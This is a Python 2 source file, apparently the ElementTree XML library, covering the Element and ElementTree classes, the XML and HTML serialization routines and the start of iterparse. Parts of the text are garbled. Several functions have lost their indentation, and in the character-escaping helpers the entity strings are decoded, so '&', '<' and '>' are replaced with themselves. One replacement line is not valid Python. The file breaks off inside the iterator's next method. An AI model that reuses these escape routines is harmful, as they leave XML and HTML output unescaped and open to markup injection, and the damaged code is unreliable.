# emulate pre-1.2 find/findtext/findall behaviour
def find(self, element, tag, namespaces=None):
for elem in element:
if elem.tag == tag:
return elem
return None
def findtext(self, element, tag, default=None, namespaces=None):
elem = self.find(element, tag)
if elem is None:
return default
return elem.text or ""
def iterfind(self, element, tag, namespaces=None):
if tag[:3] == ".//":
for elem in element.iter(tag[3:]):
yield elem
for elem in element:
if elem.tag == tag:
yield elem
def findall(self, element, tag, namespaces=None):
return list(self.iterfind(element, tag, namespaces))
try:
from . import ElementPath
except ImportError:
ElementPath = _SimpleElementPath()
##
# Parser error. This is a subclass of <b>SyntaxError</b>.
# <p>
# In addition to the exception value, an exception instance contains a
# specific exception code in the <b>code</b> attribute, and the line and
# column of the error in the <b>position</b> attribute.
class ParseError(SyntaxError):
    """XML parse error; per the module docs it carries an error ``code``
    and a (line, column) ``position`` in addition to the message."""
# --------------------------------------------------------------------
##
# Checks if an object appears to be a valid element object.
#
# @param An element instance.
# @return A true value if this is an element object.
# @defreturn flag
def iselement(element):
    """Return a true value if *element* appears to be an Element."""
    # FIXME: not sure about this; might be a better idea to look
    # for tag/attrib/text attributes
    if isinstance(element, Element):
        return True
    return hasattr(element, "tag")
##
# Element class. This class defines the Element interface, and
# provides a reference implementation of this interface.
# <p>
# The element name, attribute names, and attribute values can be
# either ASCII strings (ordinary Python strings containing only 7-bit
# ASCII characters) or Unicode strings.
#
# @param tag The element name.
# @param attrib An optional dictionary, containing element attributes.
# @param **extra Additional attributes, given as keyword arguments.
# @see Element
# @see SubElement
# @see Comment
# @see ProcessingInstruction
class Element(object):
    """Reference implementation of the Element interface.

    An element behaves like a cross between a list (of child elements)
    and a dictionary (of attributes), with extra text/tail slots.
    """
    # <tag attrib>text<child/>...</tag>tail
    ##
    # (Attribute) Element tag.
    tag = None
    ##
    # (Attribute) Element attribute dictionary. Where possible, use
    # {@link #Element.get},
    # {@link #Element.set},
    # {@link #Element.keys}, and
    # {@link #Element.items} to access
    # element attributes.
    attrib = None
    ##
    # (Attribute) Text before first subelement. This is either a
    # string or the value None. Note that if there was no text, this
    # attribute may be either None or an empty string, depending on
    # the parser.
    text = None
    ##
    # (Attribute) Text after this element's end tag, but before the
    # next sibling element's start tag. This is either a string or
    # the value None. Note that if there was no text, this attribute
    # may be either None or an empty string, depending on the parser.
    tail = None # text after end tag, if any
    # constructor
    def __init__(self, tag, attrib={}, **extra):
        # copy so neither the shared {} default nor the caller's dict
        # is ever mutated through this element
        attrib = attrib.copy()
        attrib.update(extra)
        self.tag = tag
        self.attrib = attrib
        self._children = []
    def __repr__(self):
        return "<Element %s at 0x%x>" % (repr(self.tag), id(self))
    ##
    # Creates a new element object of the same type as this element.
    #
    # @param tag Element tag.
    # @param attrib Element attributes, given as a dictionary.
    # @return A new element instance.
    def makeelement(self, tag, attrib):
        return self.__class__(tag, attrib)
    ##
    # (Experimental) Copies the current element. This creates a
    # shallow copy; subelements will be shared with the original tree.
    #
    # @return A new element instance.
    def copy(self):
        elem = self.makeelement(self.tag, self.attrib)
        elem.text = self.text
        elem.tail = self.tail
        # slice assignment copies the child list, but the children
        # themselves remain shared with the original
        elem[:] = self
        return elem
    ##
    # Returns the number of subelements. Note that this only counts
    # full elements; to check if there's any content in an element, you
    # have to check both the length and the <b>text</b> attribute.
    #
    # @return The number of subelements.
    def __len__(self):
        return len(self._children)
    def __nonzero__(self):
        warnings.warn(
            "The behavior of this method will change in future versions. "
            "Use specific 'len(elem)' or 'elem is not None' test instead.",
            FutureWarning, stacklevel=2
            )
        return len(self._children) != 0 # emulate old behaviour, for now
    ##
    # Returns the given subelement, by index.
    #
    # @param index What subelement to return.
    # @return The given subelement.
    # @exception IndexError If the given element does not exist.
    def __getitem__(self, index):
        return self._children[index]
    ##
    # Replaces the given subelement, by index.
    #
    # @param index What subelement to replace.
    # @param element The new element value.
    # @exception IndexError If the given element does not exist.
    def __setitem__(self, index, element):
        # if isinstance(index, slice):
        #     for elt in element:
        #         assert iselement(elt)
        # else:
        #     assert iselement(element)
        self._children[index] = element
    ##
    # Deletes the given subelement, by index.
    #
    # @param index What subelement to delete.
    # @exception IndexError If the given element does not exist.
    def __delitem__(self, index):
        del self._children[index]
    ##
    # Adds a subelement to the end of this element. In document order,
    # the new element will appear after the last existing subelement (or
    # directly after the text, if it's the first subelement), but before
    # the end tag for this element.
    #
    # @param element The element to add.
    def append(self, element):
        # assert iselement(element)
        self._children.append(element)
    ##
    # Appends subelements from a sequence.
    #
    # @param elements A sequence object with zero or more elements.
    # @since 1.3
    def extend(self, elements):
        # for element in elements:
        #     assert iselement(element)
        self._children.extend(elements)
    ##
    # Inserts a subelement at the given position in this element.
    #
    # @param index Where to insert the new subelement.
    def insert(self, index, element):
        # assert iselement(element)
        self._children.insert(index, element)
    ##
    # Removes a matching subelement. Unlike the <b>find</b> methods,
    # this method compares elements based on identity, not on tag
    # value or contents. To remove subelements by other means, the
    # easiest way is often to use a list comprehension to select what
    # elements to keep, and use slice assignment to update the parent
    # element.
    #
    # @param element What element to remove.
    # @exception ValueError If a matching element could not be found.
    def remove(self, element):
        # assert iselement(element)
        self._children.remove(element)
    ##
    # (Deprecated) Returns all subelements. The elements are returned
    # in document order.
    #
    # @return A list of subelements.
    # @defreturn list of Element instances
    def getchildren(self):
        warnings.warn(
            "This method will be removed in future versions. "
            "Use 'list(elem)' or iteration over elem instead.",
            DeprecationWarning, stacklevel=2
            )
        return self._children
    ##
    # Finds the first matching subelement, by tag name or path.
    #
    # @param path What element to look for.
    # @keyparam namespaces Optional namespace prefix map.
    # @return The first matching element, or None if no element was found.
    # @defreturn Element or None
    def find(self, path, namespaces=None):
        return ElementPath.find(self, path, namespaces)
    ##
    # Finds text for the first matching subelement, by tag name or path.
    #
    # @param path What element to look for.
    # @param default What to return if the element was not found.
    # @keyparam namespaces Optional namespace prefix map.
    # @return The text content of the first matching element, or the
    #     default value if no element was found. Note that if the element
    #     is found, but has no text content, this method returns an
    #     empty string.
    # @defreturn string
    def findtext(self, path, default=None, namespaces=None):
        return ElementPath.findtext(self, path, default, namespaces)
    ##
    # Finds all matching subelements, by tag name or path.
    #
    # @param path What element to look for.
    # @keyparam namespaces Optional namespace prefix map.
    # @return A list or other sequence containing all matching elements,
    #    in document order.
    # @defreturn list of Element instances
    def findall(self, path, namespaces=None):
        return ElementPath.findall(self, path, namespaces)
    ##
    # Finds all matching subelements, by tag name or path.
    #
    # @param path What element to look for.
    # @keyparam namespaces Optional namespace prefix map.
    # @return An iterator or sequence containing all matching elements,
    #    in document order.
    # @defreturn a generated sequence of Element instances
    def iterfind(self, path, namespaces=None):
        return ElementPath.iterfind(self, path, namespaces)
    ##
    # Resets an element. This function removes all subelements, clears
    # all attributes, and sets the <b>text</b> and <b>tail</b> attributes
    # to None.
    def clear(self):
        self.attrib.clear()
        self._children = []
        self.text = self.tail = None
    ##
    # Gets an element attribute. Equivalent to <b>attrib.get</b>, but
    # some implementations may handle this a bit more efficiently.
    #
    # @param key What attribute to look for.
    # @param default What to return if the attribute was not found.
    # @return The attribute value, or the default value, if the
    #     attribute was not found.
    # @defreturn string or None
    def get(self, key, default=None):
        return self.attrib.get(key, default)
    ##
    # Sets an element attribute. Equivalent to <b>attrib[key] = value</b>,
    # but some implementations may handle this a bit more efficiently.
    #
    # @param key What attribute to set.
    # @param value The attribute value.
    def set(self, key, value):
        self.attrib[key] = value
    ##
    # Gets a list of attribute names. The names are returned in an
    # arbitrary order (just like for an ordinary Python dictionary).
    # Equivalent to <b>attrib.keys()</b>.
    #
    # @return A list of element attribute names.
    # @defreturn list of strings
    def keys(self):
        return self.attrib.keys()
    ##
    # Gets element attributes, as a sequence. The attributes are
    # returned in an arbitrary order. Equivalent to <b>attrib.items()</b>.
    #
    # @return A list of (name, value) tuples for all attributes.
    # @defreturn list of (string, string) tuples
    def items(self):
        return self.attrib.items()
    ##
    # Creates a tree iterator. The iterator loops over this element
    # and all subelements, in document order, and returns all elements
    # with a matching tag.
    # <p>
    # If the tree structure is modified during iteration, new or removed
    # elements may or may not be included. To get a stable set, use the
    # list() function on the iterator, and loop over the resulting list.
    #
    # @param tag What tags to look for (default is to return all elements).
    # @return An iterator containing all the matching elements.
    # @defreturn iterator
    def iter(self, tag=None):
        # "*" means "any tag"; yields self first, then descendants in
        # document order
        if tag == "*":
            tag = None
        if tag is None or self.tag == tag:
            yield self
        for e in self._children:
            for e in e.iter(tag):
                yield e
    # compatibility
    def getiterator(self, tag=None):
        # Change for a DeprecationWarning in 1.4
        warnings.warn(
            "This method will be removed in future versions. "
            "Use 'elem.iter()' or 'list(elem.iter())' instead.",
            PendingDeprecationWarning, stacklevel=2
        )
        return list(self.iter(tag))
    ##
    # Creates a text iterator. The iterator loops over this element
    # and all subelements, in document order, and returns all inner
    # text.
    #
    # @return An iterator containing all inner text.
    # @defreturn iterator
    def itertext(self):
        tag = self.tag
        # skip elements whose tag is not a string (e.g. the Comment and
        # ProcessingInstruction marker functions)
        if not isinstance(tag, basestring) and tag is not None:
            return
        if self.text:
            yield self.text
        for e in self:
            for s in e.itertext():
                yield s
            if e.tail:
                yield e.tail
# compatibility aliases for the historical (pre-1.3) class names
_Element = _ElementInterface = Element
##
# Subelement factory. This function creates an element instance, and
# appends it to an existing element.
# <p>
# The element name, attribute names, and attribute values can be
# either 8-bit ASCII strings or Unicode strings.
#
# @param parent The parent element.
# @param tag The subelement name.
# @param attrib An optional dictionary, containing element attributes.
# @param **extra Additional attributes, given as keyword arguments.
# @return An element instance.
# @defreturn Element
def SubElement(parent, tag, attrib={}, **extra):
    """Create an element with the given tag, append it to *parent*,
    and return it.  Attributes may be passed as a dictionary and/or
    as keyword arguments (keywords win on conflicts)."""
    merged = attrib.copy()
    merged.update(extra)
    child = parent.makeelement(tag, merged)
    parent.append(child)
    return child
##
# Comment element factory. This factory function creates a special
# element that will be serialized as an XML comment by the standard
# serializer.
# <p>
# The comment string can be either an 8-bit ASCII string or a Unicode
# string.
#
# @param text A string containing the comment string.
# @return An element instance, representing a comment.
# @defreturn Element
def Comment(text=None):
    # A comment is an ordinary Element whose tag is this factory
    # function itself; the serializers special-case that tag.
    elem = Element(Comment)
    elem.text = text
    return elem
##
# PI element factory. This factory function creates a special element
# that will be serialized as an XML processing instruction by the standard
# serializer.
#
# @param target A string containing the PI target.
# @param text A string containing the PI contents, if any.
# @return An element instance, representing a PI.
# @defreturn Element
def ProcessingInstruction(target, text=None):
    # A PI is an Element tagged with this factory function; its text
    # holds the target, optionally followed by a space and the contents.
    value = target
    if text:
        value = value + " " + text
    elem = Element(ProcessingInstruction)
    elem.text = value
    return elem
PI = ProcessingInstruction
##
# QName wrapper. This can be used to wrap a QName attribute value, in
# order to get proper namespace handling on output.
#
# @param text A string containing the QName value, in the form {uri}local,
# or, if the tag argument is given, the URI part of a QName.
# @param tag Optional tag. If given, the first argument is interpreted as
# an URI, and this argument is interpreted as a local name.
# @return An opaque object, representing the QName.
class QName(object):
    """Wrap a QName attribute value for proper namespace handling on
    output.  The value is stored in the universal "{uri}local" form."""
    def __init__(self, text_or_uri, tag=None):
        # Two-argument form: the first argument is a URI and the
        # second the local name; combine them.
        if tag:
            text_or_uri = "{%s}%s" % (text_or_uri, tag)
        self.text = text_or_uri
    def __str__(self):
        return self.text
    def __hash__(self):
        return hash(self.text)
    def __cmp__(self, other):
        # Python 2 three-way comparison: compare by textual value.
        if isinstance(other, QName):
            other = other.text
        return cmp(self.text, other)
# --------------------------------------------------------------------
##
# ElementTree wrapper class. This class represents an entire element
# hierarchy, and adds some extra support for serialization to and from
# standard XML.
#
# @param element Optional root element.
# @keyparam file Optional file handle or file name. If given, the
# tree is initialized with the contents of this XML file.
class ElementTree(object):
    """Wrapper for a whole element hierarchy; adds parsing from and
    serialization to standard XML."""
    def __init__(self, element=None, file=None):
        # assert element is None or iselement(element)
        self._root = element # first node
        if file:
            self.parse(file)
    ##
    # Gets the root element for this tree.
    #
    # @return An element instance.
    # @defreturn Element
    def getroot(self):
        return self._root
    ##
    # Replaces the root element for this tree. This discards the
    # current contents of the tree, and replaces it with the given
    # element. Use with care.
    #
    # @param element An element instance.
    def _setroot(self, element):
        # assert iselement(element)
        self._root = element
    ##
    # Loads an external XML document into this element tree.
    #
    # @param source A file name or file object. If a file object is
    #     given, it only has to implement a <b>read(n)</b> method.
    # @keyparam parser An optional parser instance. If not given, the
    #     standard {@link XMLParser} parser is used.
    # @return The document root element.
    # @defreturn Element
    # @exception ParseError If the parser fails to parse the document.
    def parse(self, source, parser=None):
        # only close the source if we opened it ourselves
        close_source = False
        if not hasattr(source, "read"):
            source = open(source, "rb")
            close_source = True
        try:
            if not parser:
                parser = XMLParser(target=TreeBuilder())
            # feed the parser in 64k chunks
            while 1:
                data = source.read(65536)
                if not data:
                    break
                parser.feed(data)
            self._root = parser.close()
            return self._root
        finally:
            if close_source:
                source.close()
    ##
    # Creates a tree iterator for the root element. The iterator loops
    # over all elements in this tree, in document order.
    #
    # @param tag What tags to look for (default is to return all elements)
    # @return An iterator.
    # @defreturn iterator
    def iter(self, tag=None):
        # assert self._root is not None
        return self._root.iter(tag)
    # compatibility
    def getiterator(self, tag=None):
        # Change for a DeprecationWarning in 1.4
        warnings.warn(
            "This method will be removed in future versions. "
            "Use 'tree.iter()' or 'list(tree.iter())' instead.",
            PendingDeprecationWarning, stacklevel=2
        )
        return list(self.iter(tag))
    ##
    # Same as getroot().find(path), starting at the root of the
    # tree.
    #
    # @param path What element to look for.
    # @keyparam namespaces Optional namespace prefix map.
    # @return The first matching element, or None if no element was found.
    # @defreturn Element or None
    def find(self, path, namespaces=None):
        # assert self._root is not None
        if path[:1] == "/":
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version.  If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.find(path, namespaces)
    ##
    # Same as getroot().findtext(path), starting at the root of the tree.
    #
    # @param path What element to look for.
    # @param default What to return if the element was not found.
    # @keyparam namespaces Optional namespace prefix map.
    # @return The text content of the first matching element, or the
    #     default value if no element was found. Note that if the element
    #     is found, but has no text content, this method returns an
    #     empty string.
    # @defreturn string
    def findtext(self, path, default=None, namespaces=None):
        # assert self._root is not None
        if path[:1] == "/":
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version.  If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.findtext(path, default, namespaces)
    ##
    # Same as getroot().findall(path), starting at the root of the tree.
    #
    # @param path What element to look for.
    # @keyparam namespaces Optional namespace prefix map.
    # @return A list or iterator containing all matching elements,
    #    in document order.
    # @defreturn list of Element instances
    def findall(self, path, namespaces=None):
        # assert self._root is not None
        if path[:1] == "/":
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version.  If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.findall(path, namespaces)
    ##
    # Finds all matching subelements, by tag name or path.
    # Same as getroot().iterfind(path).
    #
    # @param path What element to look for.
    # @keyparam namespaces Optional namespace prefix map.
    # @return An iterator or sequence containing all matching elements,
    #    in document order.
    # @defreturn a generated sequence of Element instances
    def iterfind(self, path, namespaces=None):
        # assert self._root is not None
        if path[:1] == "/":
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version.  If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.iterfind(path, namespaces)
    ##
    # Writes the element tree to a file, as XML.
    #
    # @def write(file, **options)
    # @param file A file name, or a file object opened for writing.
    # @param **options Options, given as keyword arguments.
    # @keyparam encoding Optional output encoding (default is US-ASCII).
    # @keyparam xml_declaration Controls if an XML declaration should
    #     be added to the file. Use False for never, True for always,
    #     None for only if not US-ASCII or UTF-8. None is default.
    # @keyparam default_namespace Sets the default XML namespace (for "xmlns").
    # @keyparam method Optional output method ("xml", "html", "text" or
    #     "c14n"; default is "xml").
    def write(self, file_or_filename,
              # keyword arguments
              encoding=None,
              xml_declaration=None,
              default_namespace=None,
              method=None):
        # assert self._root is not None
        if not method:
            method = "xml"
        elif method not in _serialize:
            # FIXME: raise an ImportError for c14n if ElementC14N is missing?
            raise ValueError("unknown method %r" % method)
        if hasattr(file_or_filename, "write"):
            file = file_or_filename
        else:
            file = open(file_or_filename, "wb")
        try:
            write = file.write
            if not encoding:
                # c14n requires utf-8; everything else defaults to us-ascii
                if method == "c14n":
                    encoding = "utf-8"
                else:
                    encoding = "us-ascii"
            elif xml_declaration or (xml_declaration is None and
                                     encoding not in ("utf-8", "us-ascii")):
                if method == "xml":
                    write("<?xml version='1.0' encoding='%s'?>\n" % encoding)
            if method == "text":
                _serialize_text(write, self._root, encoding)
            else:
                qnames, namespaces = _namespaces(
                    self._root, encoding, default_namespace
                    )
                serialize = _serialize[method]
                serialize(write, self._root, encoding, qnames, namespaces)
        finally:
            # only close the file if we opened it ourselves
            if file_or_filename is not file:
                file.close()
    def write_c14n(self, file):
        # lxml.etree compatibility.  use output method instead
        return self.write(file, method="c14n")
# --------------------------------------------------------------------
# serialization support
def _namespaces(elem, encoding, default_namespace=None):
    """Map out the namespace declarations needed to serialize *elem*.

    Returns (qnames, namespaces), where qnames maps each raw tag or
    attribute name seen in the tree to its *encoded* "prefix:local"
    serialized form, and namespaces maps each namespace URI to the
    prefix chosen for it.
    """
    # identify namespaces used in this tree
    # maps qnames to *encoded* prefix:local names
    qnames = {None: None}
    # maps uri:s to prefixes
    namespaces = {}
    if default_namespace:
        namespaces[default_namespace] = ""
    def encode(text):
        return text.encode(encoding)
    def add_qname(qname):
        # calculate serialized qname representation
        try:
            if qname[:1] == "{":
                uri, tag = qname[1:].rsplit("}", 1)
                prefix = namespaces.get(uri)
                if prefix is None:
                    # well-known URIs get their conventional prefix;
                    # other URIs get a generated "ns<N>" prefix
                    prefix = _namespace_map.get(uri)
                    if prefix is None:
                        prefix = "ns%d" % len(namespaces)
                    if prefix != "xml":
                        namespaces[uri] = prefix
                if prefix:
                    qnames[qname] = encode("%s:%s" % (prefix, tag))
                else:
                    qnames[qname] = encode(tag) # default element
            else:
                if default_namespace:
                    # FIXME: can this be handled in XML 1.0?
                    raise ValueError(
                        "cannot use non-qualified names with "
                        "default_namespace option"
                        )
                qnames[qname] = encode(qname)
        except TypeError:
            _raise_serialization_error(qname)
    # populate qname and namespaces table
    try:
        iterate = elem.iter
    except AttributeError:
        iterate = elem.getiterator # cET compatibility
    for elem in iterate():
        tag = elem.tag
        if isinstance(tag, QName):
            if tag.text not in qnames:
                add_qname(tag.text)
        elif isinstance(tag, basestring):
            if tag not in qnames:
                add_qname(tag)
        elif tag is not None and tag is not Comment and tag is not PI:
            _raise_serialization_error(tag)
        for key, value in elem.items():
            if isinstance(key, QName):
                key = key.text
            if key not in qnames:
                add_qname(key)
            if isinstance(value, QName) and value.text not in qnames:
                add_qname(value.text)
        text = elem.text
        if isinstance(text, QName) and text.text not in qnames:
            add_qname(text.text)
    return qnames, namespaces
def _serialize_xml(write, elem, encoding, qnames, namespaces):
    """Recursively emit *elem* as XML fragments through *write*.

    *namespaces* (uri -> prefix) is passed only for the outermost call,
    so xmlns declarations appear on the root element alone; recursive
    calls pass None.
    """
    tag = elem.tag
    text = elem.text
    if tag is Comment:
        write("<!--%s-->" % _encode(text, encoding))
    elif tag is ProcessingInstruction:
        write("<?%s?>" % _encode(text, encoding))
    else:
        tag = qnames[tag]
        if tag is None:
            # a None tag serializes as bare content (text + children)
            if text:
                write(_escape_cdata(text, encoding))
            for e in elem:
                _serialize_xml(write, e, encoding, qnames, None)
        else:
            write("<" + tag)
            items = elem.items()
            if items or namespaces:
                if namespaces:
                    for v, k in sorted(namespaces.items(),
                                       key=lambda x: x[1]):  # sort on prefix
                        if k:
                            k = ":" + k
                        write(" xmlns%s=\"%s\"" % (
                            k.encode(encoding),
                            _escape_attrib(v, encoding)
                            ))
                for k, v in sorted(items):  # lexical order
                    if isinstance(k, QName):
                        k = k.text
                    if isinstance(v, QName):
                        v = qnames[v.text]
                    else:
                        v = _escape_attrib(v, encoding)
                    write(" %s=\"%s\"" % (qnames[k], v))
            if text or len(elem):
                write(">")
                if text:
                    write(_escape_cdata(text, encoding))
                for e in elem:
                    _serialize_xml(write, e, encoding, qnames, None)
                write("</" + tag + ">")
            else:
                # no content: use the short empty-element form
                write(" />")
    if elem.tail:
        write(_escape_cdata(elem.tail, encoding))
# HTML "void" elements: serialized without a closing tag by the
# html output method.
HTML_EMPTY = ("area", "base", "basefont", "br", "col", "frame", "hr",
              "img", "input", "isindex", "link", "meta", "param")
try:
    # use a set for fast membership tests where available
    HTML_EMPTY = set(HTML_EMPTY)
except NameError:
    pass
def _serialize_html(write, elem, encoding, qnames, namespaces):
    """Recursively emit *elem* as HTML fragments through *write*.

    Differs from the xml method in that elements are never written in
    the short "<tag />" form, void elements (HTML_EMPTY) get no end
    tag, and script/style content is written unescaped.
    """
    tag = elem.tag
    text = elem.text
    if tag is Comment:
        write("<!--%s-->" % _escape_cdata(text, encoding))
    elif tag is ProcessingInstruction:
        write("<?%s?>" % _escape_cdata(text, encoding))
    else:
        tag = qnames[tag]
        if tag is None:
            # a None tag serializes as bare content (text + children)
            if text:
                write(_escape_cdata(text, encoding))
            for e in elem:
                _serialize_html(write, e, encoding, qnames, None)
        else:
            write("<" + tag)
            items = elem.items()
            if items or namespaces:
                if namespaces:
                    for v, k in sorted(namespaces.items(),
                                       key=lambda x: x[1]):  # sort on prefix
                        if k:
                            k = ":" + k
                        write(" xmlns%s=\"%s\"" % (
                            k.encode(encoding),
                            _escape_attrib(v, encoding)
                            ))
                for k, v in sorted(items):  # lexical order
                    if isinstance(k, QName):
                        k = k.text
                    if isinstance(v, QName):
                        v = qnames[v.text]
                    else:
                        v = _escape_attrib_html(v, encoding)
                    # FIXME: handle boolean attributes
                    write(" %s=\"%s\"" % (qnames[k], v))
            write(">")
            ltag = tag.lower()
            if text:
                # script/style contents must not be entity-escaped
                if ltag == "script" or ltag == "style":
                    write(_encode(text, encoding))
                else:
                    write(_escape_cdata(text, encoding))
            for e in elem:
                _serialize_html(write, e, encoding, qnames, None)
            if ltag not in HTML_EMPTY:
                write("</" + tag + ">")
    if elem.tail:
        write(_escape_cdata(elem.tail, encoding))
def _serialize_text(write, elem, encoding):
for part in elem.itertext():
write(part.encode(encoding))
if elem.tail:
write(elem.tail.encode(encoding))
# dispatch table mapping output method names to serializer functions
_serialize = {
    "xml": _serialize_xml,
    "html": _serialize_html,
    "text": _serialize_text,
# this optional method is imported at the end of the module
#   "c14n": _serialize_c14n,
}
##
# Registers a namespace prefix. The registry is global, and any
# existing mapping for either the given prefix or the namespace URI
# will be removed.
#
# @param prefix Namespace prefix.
# @param uri Namespace uri. Tags and attributes in this namespace
# will be serialized with the given prefix, if at all possible.
# @exception ValueError If the prefix is reserved, or is otherwise
# invalid.
def register_namespace(prefix, uri):
    """Register a global namespace prefix.

    Any existing mapping for either the given prefix or the namespace
    URI is removed first.

    @param prefix Namespace prefix.
    @param uri Namespace uri.  Tags and attributes in this namespace
        will be serialized with the given prefix, if at all possible.
    @exception ValueError If the prefix is reserved (matches the
        auto-generated "ns<number>" form used by the serializer).
    """
    # raw string: "\d" is an invalid escape in an ordinary literal
    if re.match(r"ns\d+$", prefix):
        raise ValueError("Prefix format reserved for internal use")
    # snapshot the items so the mapping can be mutated while scanning
    # for clashes (deleting during dict iteration is an error on
    # modern Pythons)
    for k, v in list(_namespace_map.items()):
        if k == uri or v == prefix:
            del _namespace_map[k]
    _namespace_map[uri] = prefix
# global map of "well-known" namespace URIs to their conventional
# prefixes; extended at runtime via register_namespace()
_namespace_map = {
    # "well-known" namespace prefixes
    "http://www.w3.org/XML/1998/namespace": "xml",
    "http://www.w3.org/1999/xhtml": "html",
    "http://www.w3.org/1999/02/22-rdf-syntax-ns#": "rdf",
    "http://schemas.xmlsoap.org/wsdl/": "wsdl",
    # xml schema
    "http://www.w3.org/2001/XMLSchema": "xs",
    "http://www.w3.org/2001/XMLSchema-instance": "xsi",
    # dublin core
    "http://purl.org/dc/elements/1.1/": "dc",
}
def _raise_serialization_error(text):
raise TypeError(
"cannot serialize %r (type %s)" % (text, type(text).__name__)
)
def _encode(text, encoding):
try:
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_cdata(text, encoding):
# escape character data
try:
# it's worth avoiding do-nothing calls for strings that are
# shorter than 500 character, or so. assume that's, by far,
# the most common case in most applications.
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib(text, encoding):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
if "\n" in text:
text = text.replace("\n", " ")
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib_html(text, encoding):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
return text.encode(encoding, "xmlcharrefreplace")
except (TypeError, AttributeError):
_raise_serialization_error(text)
# --------------------------------------------------------------------
##
# Generates a string representation of an XML element, including all
# subelements.
#
# @param element An Element instance.
# @keyparam encoding Optional output encoding (default is US-ASCII).
# @keyparam method Optional output method ("xml", "html", "text" or
# "c14n"; default is "xml").
# @return An encoded string containing the XML data.
# @defreturn string
def tostring(element, encoding=None, method=None):
    """Serialize *element* (and subelements) to an XML string."""
    # Collect fragments through a minimal file-like object whose
    # write() simply appends to a list, then join them.
    class _Sink:
        pass
    fragments = []
    sink = _Sink()
    sink.write = fragments.append
    ElementTree(element).write(sink, encoding, method=method)
    return "".join(fragments)
##
# Generates a string representation of an XML element, including all
# subelements. The string is returned as a sequence of string fragments.
#
# @param element An Element instance.
# @keyparam encoding Optional output encoding (default is US-ASCII).
# @keyparam method Optional output method ("xml", "html", "text" or
# "c14n"; default is "xml").
# @return A sequence object containing the XML data.
# @defreturn sequence
# @since 1.3
def tostringlist(element, encoding=None, method=None):
    """Serialize *element* (and subelements) to a list of XML string
    fragments."""
    class _Sink:
        pass
    fragments = []
    sink = _Sink()
    sink.write = fragments.append
    ElementTree(element).write(sink, encoding, method=method)
    # FIXME: merge small fragments into larger parts
    return fragments
##
# Writes an element tree or element structure to sys.stdout. This
# function should be used for debugging only.
# <p>
# The exact output format is implementation dependent. In this
# version, it's written as an ordinary XML file.
#
# @param elem An element tree or an individual element.
def dump(elem):
    # Debugging helper: write the tree to sys.stdout as ordinary XML,
    # ensuring the output ends with a newline.
    if isinstance(elem, ElementTree):
        tree = elem
    else:
        tree = ElementTree(elem)
    tree.write(sys.stdout)
    tail = tree.getroot().tail
    if not tail or tail[-1] != "\n":
        sys.stdout.write("\n")
# --------------------------------------------------------------------
# parsing
##
# Parses an XML document into an element tree.
#
# @param source A filename or file object containing XML data.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return An ElementTree instance
def parse(source, parser=None):
    """Parse an XML document from a file name or file object and
    return an ElementTree instance."""
    et = ElementTree()
    et.parse(source, parser)
    return et
##
# Parses an XML document into an element tree incrementally, and reports
# what's going on to the user.
#
# @param source A filename or file object containing XML data.
# @param events A list of events to report back. If omitted, only "end"
# events are reported.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return A (event, elem) iterator.
def iterparse(source, events=None, parser=None):
    """Incrementally parse *source*, returning a (event, elem)
    iterator.  *events* defaults to reporting "end" events only."""
    # If we were handed a file name (anything without read()), open it
    # ourselves -- and then we are also responsible for closing it.
    close_source = not hasattr(source, "read")
    if close_source:
        source = open(source, "rb")
    try:
        if not parser:
            parser = XMLParser(target=TreeBuilder())
        return _IterParseIterator(source, events, parser, close_source)
    except:
        if close_source:
            source.close()
        raise
class _IterParseIterator(object):
    """Iterator behind iterparse(): wires expat-level handlers that
    buffer (event, item) tuples, then pumps the parser on demand."""
    def __init__(self, source, events, parser, close_source=False):
        self._file = source
        self._close_file = close_source
        self._events = []      # buffered (event, item) tuples
        self._index = 0        # next buffered event to hand out
        self._error = None     # parse error deferred until buffer drained
        self.root = self._root = None
        self._parser = parser
        # wire up the parser for event reporting
        parser = self._parser._parser
        append = self._events.append
        if events is None:
            events = ["end"]
        for event in events:
            if event == "start":
                try:
                    # ask expat for ordered/specified attributes so the
                    # faster list-based start handler can be used
                    parser.ordered_attributes = 1
                    parser.specified_attributes = 1
                    def handler(tag, attrib_in, event=event, append=append,
                                start=self._parser._start_list):
                        append((event, start(tag, attrib_in)))
                    parser.StartElementHandler = handler
                except AttributeError:
                    def handler(tag, attrib_in, event=event, append=append,
                                start=self._parser._start):
                        append((event, start(tag, attrib_in)))
                    parser.StartElementHandler = handler
            elif event == "end":
                def handler(tag, event=event, append=append,
                            end=self._parser._end):
                    append((event, end(tag)))
                parser.EndElementHandler = handler
            elif event == "start-ns":
                def handler(prefix, uri, event=event, append=append):
                    try:
                        uri = (uri or "").encode("ascii")
                    except UnicodeError:
                        pass
                    append((event, (prefix or "", uri or "")))
                parser.StartNamespaceDeclHandler = handler
            elif event == "end-ns":
                def handler(prefix, event=event, append=append):
                    append((event, None))
                parser.EndNamespaceDeclHandler = handler
            else:
                raise ValueError("unknown event %r" % event)
    def next(self):
        try:
            while 1:
                try:
